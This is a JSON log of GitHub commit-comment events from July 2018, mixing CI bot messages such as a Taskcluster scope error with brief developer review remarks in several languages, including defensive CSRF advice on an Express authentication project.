{"id":"7916462095","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29590389,"position":null,"line":null,"path":null,"commit_id":"4c8ce265e9d78560ae2677182a95c62e121f42e0","created_at":"2018-07-04T06:20:09Z","updated_at":"2018-07-04T06:20:09Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/PahJ0on7R1uDI8tREuXtYQ\",\n            \"queue:schedule-task:taskcluster-github/PahJ0on7R1uDI8tREuXtYQ/PahJ0on7R1uDI8tREuXtYQ\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/PahJ0on7R1uDI8tREuXtYQ\",\n                \"queue:schedule-task:taskcluster-github/PahJ0on7R1uDI8tREuXtYQ/PahJ0on7R1uDI8tREuXtYQ\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-04T06:20:09.649Z\n\n</details>"}},"created_at":"2018-07-04T06:20:09Z"}
{"id":"7916468108","type":"CommitCommentEvent","actor":{"login":"390056081"},"repo":{"name":"390056081/zjs"},"payload":{"comment":{"id":29590407,"position":134,"line":134,"path":"YQQTP.Broker6/src/app.js","commit_id":"4d26ab97841984c7a620cbfd4e34dcafdc953bf7","created_at":"2018-07-04T06:21:58Z","updated_at":"2018-07-04T06:21:58Z","author_association":"OWNER","body":"看看"}},"created_at":"2018-07-04T06:21:58Z"}
{"id":"7916491432","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29590444,"position":5,"line":33,"path":"lib/backup_restore/backuper.rb","commit_id":"0af159546a6d580576380167c5ce3fb8ec0b9004","created_at":"2018-07-04T06:28:56Z","updated_at":"2018-07-04T06:28:56Z","author_association":"MEMBER","body":"Oops "}},"created_at":"2018-07-04T06:28:56Z"}
{"id":"7916498006","type":"CommitCommentEvent","actor":{"login":"jfussion"},"repo":{"name":"jfussion/jts-build-tools"},"payload":{"comment":{"id":29590457,"position":null,"line":null,"path":null,"commit_id":"7a26e840d60dc8e38b954fba470e1e1bb46e6083","created_at":"2018-07-04T06:30:51Z","updated_at":"2018-07-04T06:30:51Z","author_association":"OWNER","body":"Created multidev environment [jts-build-tools#ci-21](https://dashboard.pantheon.io/sites/1ad6d742-0faf-463f-a070-a242ff208bea#ci-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-21-jts-build-tools.pantheonsite.io/)"}},"created_at":"2018-07-04T06:30:51Z"}
{"id":"7916504672","type":"CommitCommentEvent","actor":{"login":"mungojam"},"repo":{"name":"hvanbakel/CsprojToVs2017"},"payload":{"comment":{"id":29590467,"position":26,"line":26,"path":"Project2015To2017.Console/Options.cs","commit_id":"93427f971f5b80616e8784535340fd2fe1078c90","created_at":"2018-07-04T06:32:49Z","updated_at":"2018-07-04T06:32:49Z","author_association":"CONTRIBUTOR","body":"Most of the class is and is fine, it's just the UpdateProject method which is specifically what the transforms are for. You could pass it in as a pre-transform to the converter so you wouldn't need to pass any options down to the converter"}},"created_at":"2018-07-04T06:32:49Z"}
{"id":"7916512650","type":"CommitCommentEvent","actor":{"login":"andytt"},"repo":{"name":"volltin/USTC-Software-2018-BE-Test"},"payload":{"comment":{"id":29590480,"position":11,"line":11,"path":"be_test/users/models.py","commit_id":"50a1b75c8b0ecda40fe90dbae7de514e0eea54ec","created_at":"2018-07-04T06:35:13Z","updated_at":"2018-07-04T06:35:13Z","author_association":"NONE","body":"这里是想用一个字段记录用户设置的 默认登录的时长，也就是sessionid的max-age。后来发现有点多余"}},"created_at":"2018-07-04T06:35:13Z"}
{"id":"7916515655","type":"CommitCommentEvent","actor":{"login":"sekisanchi"},"repo":{"name":"sekisanchi/EtherAddressLookup"},"payload":{"comment":{"id":29590492,"position":null,"line":null,"path":null,"commit_id":"ee5bdc4b308755f48b914666c55df940a54b4d9e","created_at":"2018-07-04T06:36:06Z","updated_at":"2018-07-04T06:36:06Z","author_association":"OWNER","body":"Some errors on URL link comments"}},"created_at":"2018-07-04T06:36:06Z"}
{"id":"7916516669","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29590493,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-04T06:36:23Z","updated_at":"2018-07-04T06:36:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T06:36:23Z"}
{"id":"7916524872","type":"CommitCommentEvent","actor":{"login":"jfussion"},"repo":{"name":"jfussion/jts-build-tools"},"payload":{"comment":{"id":29590503,"position":null,"line":null,"path":null,"commit_id":"e18e4f0957e3202d2a2bd13e064f85f27a37e656","created_at":"2018-07-04T06:38:51Z","updated_at":"2018-07-04T06:38:51Z","author_association":"OWNER","body":"Created multidev environment [jts-build-tools#ci-23](https://dashboard.pantheon.io/sites/1ad6d742-0faf-463f-a070-a242ff208bea#ci-23).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-23-jts-build-tools.pantheonsite.io/)"}},"created_at":"2018-07-04T06:38:51Z"}
{"id":"7916525080","type":"CommitCommentEvent","actor":{"login":"euchkatzl"},"repo":{"name":"i-novation/ngx-datatable"},"payload":{"comment":{"id":29590504,"position":null,"line":null,"path":null,"commit_id":"1964db1f7ed6f0a9f1ac986b72f2491cec0b4fe0","created_at":"2018-07-04T06:38:55Z","updated_at":"2018-07-04T06:38:55Z","author_association":"COLLABORATOR","body":"The line in your package.json should look like \r\n\r\n\"@swimlane/ngx-datatable\": \"git+https://github.com/i-novation/ngx-datatable.git#drag-drop\","}},"created_at":"2018-07-04T06:38:55Z"}
{"id":"7916525703","type":"CommitCommentEvent","actor":{"login":"zhfeng"},"repo":{"name":"rsynek/drools"},"payload":{"comment":{"id":29590506,"position":16,"line":323,"path":"drools-persistence/drools-persistence-api/src/main/java/org/drools/persistence/jta/JtaTransactionManager.java","commit_id":"46276dddc315d120c29c3307d3a8f316a5b0c52c","created_at":"2018-07-04T06:39:06Z","updated_at":"2018-07-04T06:39:06Z","author_association":"NONE","body":"@rsynek How about retesting with this change ?  The tests are still failing ?"}},"created_at":"2018-07-04T06:39:06Z"}
{"id":"7916525777","type":"CommitCommentEvent","actor":{"login":"DanielGBullido"},"repo":{"name":"atwwei/ngx-dfp"},"payload":{"comment":{"id":29590507,"position":null,"line":null,"path":null,"commit_id":"ef22c29c3a602c66817cc2aeb2de6efaf0e0ca36","created_at":"2018-07-04T06:39:08Z","updated_at":"2018-07-04T06:39:08Z","author_association":"CONTRIBUTOR","body":"oh! F**** ! thank for fix"}},"created_at":"2018-07-04T06:39:08Z"}
{"id":"7916531323","type":"CommitCommentEvent","actor":{"login":"OtherCrashOverride"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29590517,"position":null,"line":null,"path":null,"commit_id":"2446384d762563d50b432455d07829d37d805dd3","created_at":"2018-07-04T06:40:43Z","updated_at":"2018-07-04T06:40:43Z","author_association":"OWNER","body":"I don't believe its significant enough to cause confusion warranting a change."}},"created_at":"2018-07-04T06:40:43Z"}
{"id":"7916532532","type":"CommitCommentEvent","actor":{"login":"DanielGBullido"},"repo":{"name":"atwwei/ngx-dfp"},"payload":{"comment":{"id":29590519,"position":null,"line":null,"path":null,"commit_id":"dc9afed32f56c905e6fa6b1c74a774c0fce3642d","created_at":"2018-07-04T06:41:04Z","updated_at":"2018-07-04T06:41:04Z","author_association":"CONTRIBUTOR","body":"I was convinced that that should go there..."}},"created_at":"2018-07-04T06:41:04Z"}
{"id":"7916539340","type":"CommitCommentEvent","actor":{"login":"denio-rus"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29590535,"position":4,"line":6,"path":"lesson4/station.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T06:42:53Z","updated_at":"2018-07-04T06:42:53Z","author_association":"OWNER","body":"я всего лишь хотел, чтоб название начиналось с цифры или большой буквы )) а не со всяких знаков препинания...  А так, посмотрел списки станций, там и  \"12 км\" и \"120 км КЗП\" какое-нить, и что-то через дефис, в целом - анархия...\r\n"}},"created_at":"2018-07-04T06:42:53Z"}
{"id":"7916543396","type":"CommitCommentEvent","actor":{"login":"WEBwangfangdong"},"repo":{"name":"PanJiaChen/vueAdmin-template"},"payload":{"comment":{"id":29590543,"position":null,"line":null,"path":null,"commit_id":"746aff560932704ae821f82f10b8b2a9681d5177","created_at":"2018-07-04T06:44:00Z","updated_at":"2018-07-04T06:44:00Z","author_association":"NONE","body":"安师大"}},"created_at":"2018-07-04T06:44:00Z"}
{"id":"7916547093","type":"CommitCommentEvent","actor":{"login":"WEBwangfangdong"},"repo":{"name":"PanJiaChen/vueAdmin-template"},"payload":{"comment":{"id":29590552,"position":null,"line":null,"path":null,"commit_id":"746aff560932704ae821f82f10b8b2a9681d5177","created_at":"2018-07-04T06:45:03Z","updated_at":"2018-07-04T06:45:03Z","author_association":"NONE","body":"为什么不要webpack打包vue和element"}},"created_at":"2018-07-04T06:45:03Z"}
{"id":"7916548114","type":"CommitCommentEvent","actor":{"login":"mtbc"},"repo":{"name":"openmicroscopy/openmicroscopy"},"payload":{"comment":{"id":29590556,"position":null,"line":null,"path":null,"commit_id":"b249097c0a3741e0bfbbf6c41d89adc70e031505","created_at":"2018-07-04T06:45:18Z","updated_at":"2018-07-04T06:45:18Z","author_association":"MEMBER","body":":+1:"}},"created_at":"2018-07-04T06:45:18Z"}
{"id":"7916548841","type":"CommitCommentEvent","actor":{"login":"idev4u"},"repo":{"name":"cloudfoundry-incubator/bits-service-release"},"payload":{"comment":{"id":29590558,"position":null,"line":null,"path":null,"commit_id":"af91357fb287d3fd69c87d0b63a958e7093d10e3","created_at":"2018-07-04T06:45:29Z","updated_at":"2018-07-04T06:45:29Z","author_association":"COLLABORATOR","body":"@pego how did you verify this?"}},"created_at":"2018-07-04T06:45:29Z"}
{"id":"7916551124","type":"CommitCommentEvent","actor":{"login":"Khazbs"},"repo":{"name":"toxadezigner/HseProject"},"payload":{"comment":{"id":29590564,"position":null,"line":null,"path":null,"commit_id":"fd6dbc1df67d58768f172bcefbe3447c49f91428","created_at":"2018-07-04T06:46:08Z","updated_at":"2018-07-04T06:46:08Z","author_association":"COLLABORATOR","body":"So bad that it's actually good 👍"}},"created_at":"2018-07-04T06:46:08Z"}
{"id":"7916551218","type":"CommitCommentEvent","actor":{"login":"whtsky"},"repo":{"name":"offu/WeRoBot"},"payload":{"comment":{"id":29590565,"position":3,"line":3,"path":"travis/script.sh","commit_id":"24d18f981207dbd3013afc84fd8b9450874142e6","created_at":"2018-07-04T06:46:10Z","updated_at":"2018-07-04T06:46:10Z","author_association":"COLLABORATOR","body":"看起来只有 pypy 的测试炸了\r\n\r\n并没有看到明显的测试时间缩短，先不管了"}},"created_at":"2018-07-04T06:46:10Z"}
{"id":"7916557999","type":"CommitCommentEvent","actor":{"login":"Boyibo2017"},"repo":{"name":"Boyibo2017/Boyibo.CodingSheet"},"payload":{"comment":{"id":29590578,"position":null,"line":null,"path":null,"commit_id":"d09b9a106654aa8f23483fea24e709add08db18c","created_at":"2018-07-04T06:48:04Z","updated_at":"2018-07-04T06:48:04Z","author_association":"OWNER","body":"When your talent can't support your ambition, you should clam down and study.\r\nWhen your ability can't realize your dream.\r\nYou should practice with all your heart.\r\nAsk yourself: What kind of life you pursue?"}},"created_at":"2018-07-04T06:48:04Z"}
{"id":"7916559208","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/homework_1"},"payload":{"comment":{"id":29590580,"position":9,"line":9,"path":"src/main/java/ru/pavel/homework/utils/MessageSourceWrapper.java","commit_id":"928060e19fe1e00c152fa0bc5199dd1c9206588f","created_at":"2018-07-04T06:48:23Z","updated_at":"2018-07-04T06:48:23Z","author_association":"NONE","body":"Ну и интерфейс бы к нему сделать, всё-таки))))))"}},"created_at":"2018-07-04T06:48:23Z"}
{"id":"7916563539","type":"CommitCommentEvent","actor":{"login":"cwuethrich"},"repo":{"name":"hvanbakel/CsprojToVs2017"},"payload":{"comment":{"id":29590596,"position":26,"line":26,"path":"Project2015To2017.Console/Options.cs","commit_id":"93427f971f5b80616e8784535340fd2fe1078c90","created_at":"2018-07-04T06:49:35Z","updated_at":"2018-07-04T06:49:35Z","author_association":"NONE","body":"I changed it to a pre converter last night:\r\nhttps://github.com/inova-solutions/CsprojToVs2017/commit/30acedf665b815f8e644bf6011f47e9e01b3623f\r\n\r\nWhat do you think about this version?"}},"created_at":"2018-07-04T06:49:35Z"}
{"id":"7916564528","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29590598,"position":null,"line":null,"path":null,"commit_id":"60174a96f4708db7498625a3e99a10d966cc0001","created_at":"2018-07-04T06:49:52Z","updated_at":"2018-07-04T06:49:52Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/60174a96f4708db7498625a3e99a10d966cc0001#commitcomment-29589593) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/38f7a7bb26f87e39899e78376188419162b7e23a/daily_2018_7_4/report.md). cc @ararslan"}},"created_at":"2018-07-04T06:49:52Z"}
{"id":"7916566679","type":"CommitCommentEvent","actor":{"login":"RecipesbyChefs"},"repo":{"name":"RecipesbyChefs/recipesbychefs"},"payload":{"comment":{"id":29590602,"position":null,"line":null,"path":null,"commit_id":"4160977546deb7a41517a93f9f9d340dcb14c4d7","created_at":"2018-07-04T06:50:25Z","updated_at":"2018-07-04T06:50:25Z","author_association":"OWNER","body":"Added next page link."}},"created_at":"2018-07-04T06:50:25Z"}
{"id":"7916566995","type":"CommitCommentEvent","actor":{"login":"volltin"},"repo":{"name":"volltin/USTC-Software-2018-BE-Test"},"payload":{"comment":{"id":29590604,"position":11,"line":11,"path":"be_test/users/models.py","commit_id":"50a1b75c8b0ecda40fe90dbae7de514e0eea54ec","created_at":"2018-07-04T06:50:30Z","updated_at":"2018-07-04T06:50:30Z","author_association":"OWNER","body":"我看错了，以为这是记录登陆的时刻。"}},"created_at":"2018-07-04T06:50:30Z"}
{"id":"7916572271","type":"CommitCommentEvent","actor":{"login":"yuji"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":29590611,"position":8,"line":139,"path":"lib/MT/ArchiveType/ContentTypeAuthor.pm","commit_id":"e614c70df345bf8de809b3fe982fecdaae425484","created_at":"2018-07-04T06:51:56Z","updated_at":"2018-07-04T06:51:56Z","author_association":"MEMBER","body":"!$limit のときは、No limit にしたいと言う話を前にした記憶があるんだけど、それはまずい？"}},"created_at":"2018-07-04T06:51:56Z"}
{"id":"7916575484","type":"CommitCommentEvent","actor":{"login":"andytt"},"repo":{"name":"volltin/USTC-Software-2018-BE-Test"},"payload":{"comment":{"id":29590619,"position":19,"line":125,"path":"be_test/users/views.py","commit_id":"5972a9b8504393e90aeb86ee8a9fde4b418adea6","created_at":"2018-07-04T06:52:49Z","updated_at":"2018-07-04T06:52:49Z","author_association":"NONE","body":"确实没有考虑到，23333。不知道django有没有类似bottle那种可以直接解析python类型到json的 Response。。。"}},"created_at":"2018-07-04T06:52:49Z"}
{"id":"7916588442","type":"CommitCommentEvent","actor":{"login":"rsynek"},"repo":{"name":"rsynek/drools"},"payload":{"comment":{"id":29590647,"position":16,"line":323,"path":"drools-persistence/drools-persistence-api/src/main/java/org/drools/persistence/jta/JtaTransactionManager.java","commit_id":"46276dddc315d120c29c3307d3a8f316a5b0c52c","created_at":"2018-07-04T06:56:22Z","updated_at":"2018-07-04T06:56:22Z","author_association":"OWNER","body":"@zhfeng yesterday afternoon I've got results (unfortunately there was a testing DB2 was broken in the lab, which introduced some delay). Anyway, good news - the regression with drools-persistence on DB2 is gone and the failures on WebLogic are not connected to this change. We're good to go, will prepare PRs for merging.\r\n\r\nBig thanks for helping with these issues!"}},"created_at":"2018-07-04T06:56:22Z"}
{"id":"7916597612","type":"CommitCommentEvent","actor":{"login":"n-b-sonar"},"repo":{"name":"SonarSource/sonar-custom-rules-examples"},"payload":{"comment":{"id":29590665,"position":39,"line":88,"path":"java-custom-rules/pom.xml","commit_id":"98afcd602106234a74c55bd348856c22b870d227","created_at":"2018-07-04T06:58:48Z","updated_at":"2018-07-04T06:58:48Z","author_association":"NONE","body":"Cool, thanks for the clarification !"}},"created_at":"2018-07-04T06:58:48Z"}
{"id":"7916598860","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29590667,"position":4,"line":2,"path":".gitignore","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T06:59:07Z","updated_at":"2018-07-04T06:59:07Z","author_association":"NONE","body":"I can't see the client code but I'll assume there are no issues with the implementation there"}},"created_at":"2018-07-04T06:59:07Z"}
{"id":"7916599027","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29590668,"position":7,"line":7,"path":"server/middleware/csrfCheck.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T06:59:09Z","updated_at":"2018-07-04T06:59:09Z","author_association":"NONE","body":"req.headers are user supplied input.\r\nMight be a bit excessive to check them especially since they are always a string.\r\nBut it's worth considering\r\n\r\nI also like having a dedicated GET parameter that can be used to send the token when setting the headers might not be an option (like with naive HTML form submissions)"}},"created_at":"2018-07-04T06:59:09Z"}
{"id":"7916599123","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29590670,"position":9,"line":9,"path":"server/middleware/csrfCheck.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T06:59:11Z","updated_at":"2018-07-04T06:59:11Z","author_association":"NONE","body":"Might worth considering counting how many failed tokens attempt  were done previously and\r\nTerminate the session if there are many attempts.\r\n\r\nIf your going to anyway implement rate limiting all over your api (as you should) you can just make sure you count failed token use in your rate limiting implementation\r\n\r\nI would also send back the valid token with the error so if it was done from the app but for some reason the token is not synced properly (like if you have multiple tabs open) the app can use the correct token farther on"}},"created_at":"2018-07-04T06:59:11Z"}
{"id":"7916599193","type":"CommitCommentEvent","actor":{"login":"ouyangkid"},"repo":{"name":"GustavZ/Mobile_Mask_RCNN"},"payload":{"comment":{"id":29590671,"position":null,"line":null,"path":null,"commit_id":"943b09130a18552048d3641ab076def76c4b2bb2","created_at":"2018-07-04T06:59:12Z","updated_at":"2018-07-04T06:59:12Z","author_association":"NONE","body":"I also confused why you set two warmup module. So why do you close the issue functions?\r\nI get some problems when deploying your code, such as the getax() function in eval_coco.py?\r\nOr I should move to realtime_object_detection?"}},"created_at":"2018-07-04T06:59:12Z"}
{"id":"7916599454","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29590672,"position":9,"line":11,"path":"server/routes/users.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T06:59:16Z","updated_at":"2018-07-04T06:59:16Z","author_association":"NONE","body":"Every post route should have CSRF protection.\r\nI know register can look harmless but if you don't check the token you might open yourself to a ddos attack\r\nwhere melodious sites causes all the users who visit it to bulk register/login to your service\r\nSo register login and logout routes should have CSRF protection"}},"created_at":"2018-07-04T06:59:16Z"}
{"id":"7916599573","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29590674,"position":11,"line":13,"path":"server/routes/users.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T06:59:18Z","updated_at":"2018-07-04T06:59:18Z","author_association":"NONE","body":"Not CSRF related and again might be excessive but I would make sure password is a String as well.\r\nIf at all you don't want to spend time on hashing what is clearly a fake login attempt"}},"created_at":"2018-07-04T06:59:18Z"}
{"id":"7916599819","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29590675,"position":75,"line":104,"path":"server/routes/users.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T06:59:22Z","updated_at":"2018-07-04T06:59:22Z","author_association":"NONE","body":"In general GET routes do not need a CSRF protection\r\n\r\nNo harm leaving it here and it might be better if you assume for some reason GET route will change data or can stress the server.\r\nBut in general GET routes should never change any value and \r\nCSRF should not cause any issues on them\r\n\r\nThe logout route for example should be a POST and not a GET route and should contain CSRF protection"}},"created_at":"2018-07-04T06:59:22Z"}
{"id":"7916599824","type":"CommitCommentEvent","actor":{"login":"adhik97"},"repo":{"name":"udacity/reactnd-udacimeals-complete"},"payload":{"comment":{"id":29590676,"position":21,"line":21,"path":"src/components/App.js","commit_id":"e01aeaf5719ab83cb4af8bf6aa944148335122f9","created_at":"2018-07-04T06:59:22Z","updated_at":"2018-07-04T06:59:22Z","author_association":"NONE","body":"Object.keys returns an Array with all the keys.\r\nYou can find more about it overe here\r\n\r\nhttps://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/keys"}},"created_at":"2018-07-04T06:59:22Z"}
{"id":"7916599975","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29590677,"position":5,"line":5,"path":"server/utils/utils.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T06:59:24Z","updated_at":"2018-07-04T06:59:24Z","author_association":"NONE","body":"CSRF token doen't have to be as secure as the session token.\r\nNot a major issue but it might be worth having some separation here if you want\r\nthe session to be more secure but don't want to wast so much entropy on the token\r\n"}},"created_at":"2018-07-04T06:59:24Z"}
{"id":"7916602187","type":"CommitCommentEvent","actor":{"login":"noahc3"},"repo":{"name":"yexun1995/auto-h-encore"},"payload":{"comment":{"id":29590679,"position":null,"line":null,"path":null,"commit_id":"0a5bf9a5220086f0b7bae97dd5950c75da4d75dd","created_at":"2018-07-04T07:00:00Z","updated_at":"2018-07-04T07:00:00Z","author_association":"NONE","body":"There is now a Language.cs file with a dictionary of strings in master. \r\n\r\nI'm not sure how well you know C# or if your even using an IDE to do this, but basically:\r\n\r\nCreate a copy of the dictionary named \"English\" inside of the Languages dictionary. Add this copy into the Languages dictionary (put a comma after the original English dictionary).\r\n\r\nChange the name \"English\" on the duplicate to Chinese (in hanzi to make it more clear to the user)\r\n\r\nFor every key value pair ( { [KEY], [VALUE] } ) translate just the value, leave the key.\r\n\r\n\r\nThis is a seriously awesome favor. Thank you so much for the help! Let me know if you have any questions."}},"created_at":"2018-07-04T07:00:00Z"}
{"id":"7916604148","type":"CommitCommentEvent","actor":{"login":"littlenoob4026"},"repo":{"name":"littlenoob4026/littlenoob4026.github.io"},"payload":{"comment":{"id":29590689,"position":null,"line":null,"path":null,"commit_id":"ff775a7ae4ff4c4671133b59d372f1b59fd76516","created_at":"2018-07-04T07:00:24Z","updated_at":"2018-07-04T07:00:24Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-04T07:00:24Z"}
{"id":"7916614188","type":"CommitCommentEvent","actor":{"login":"YHNdnzj"},"repo":{"name":"YHNdnzj/EWS-Initialize"},"payload":{"comment":{"id":29590709,"position":14,"line":86,"path":"EWS-Initialize.sh","commit_id":"ca3d6b487863f5696d9bc76596fdb43546c82632","created_at":"2018-07-04T07:02:58Z","updated_at":"2018-07-04T07:02:58Z","author_association":"OWNER","body":"Fix a bug"}},"created_at":"2018-07-04T07:02:58Z"}
{"id":"7916622087","type":"CommitCommentEvent","actor":{"login":"jeremyescott"},"repo":{"name":"Varying-Vagrant-Vagrants/VVV"},"payload":{"comment":{"id":29590727,"position":null,"line":null,"path":null,"commit_id":"948fcac66e63caae8bdeb291ec4f93379f59c9f7","created_at":"2018-07-04T07:04:59Z","updated_at":"2018-07-04T07:04:59Z","author_association":"NONE","body":"So excited to see this! Missing mail testing so much. Is the develop branch complete enough I can start running this?"}},"created_at":"2018-07-04T07:04:59Z"}
{"id":"7916636674","type":"CommitCommentEvent","actor":{"login":"Thibault-69"},"repo":{"name":"Thibault-69/Remote-webcam-Control-Beta"},"payload":{"comment":{"id":29590752,"position":null,"line":null,"path":null,"commit_id":"4c3498d0f4cc0c3fa2bbb0460c7bede5b6e336a6","created_at":"2018-07-04T07:08:30Z","updated_at":"2018-07-04T07:08:30Z","author_association":"OWNER","body":"csc"}},"created_at":"2018-07-04T07:08:30Z"}
{"id":"7916648424","type":"CommitCommentEvent","actor":{"login":"ScorchEmber256"},"repo":{"name":"jarveson/rpcs3"},"payload":{"comment":{"id":29590769,"position":null,"line":null,"path":null,"commit_id":"5f4455eff7a08aec1481d7842fd3079deb20dca1","created_at":"2018-07-04T07:11:19Z","updated_at":"2018-07-04T07:11:19Z","author_association":"NONE","body":"How come this fix has not been merged?\r\n"}},"created_at":"2018-07-04T07:11:19Z"}
{"id":"7916654904","type":"CommitCommentEvent","actor":{"login":"saurus1969"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29590784,"position":null,"line":null,"path":null,"commit_id":"986e3d07c00e0b2b92cc23d7c02e93a789fa81c7","created_at":"2018-07-04T07:12:49Z","updated_at":"2018-07-04T07:12:49Z","author_association":"NONE","body":"I would expect, That the overload conept for a king is also relevant for endgame"}},"created_at":"2018-07-04T07:12:49Z"}
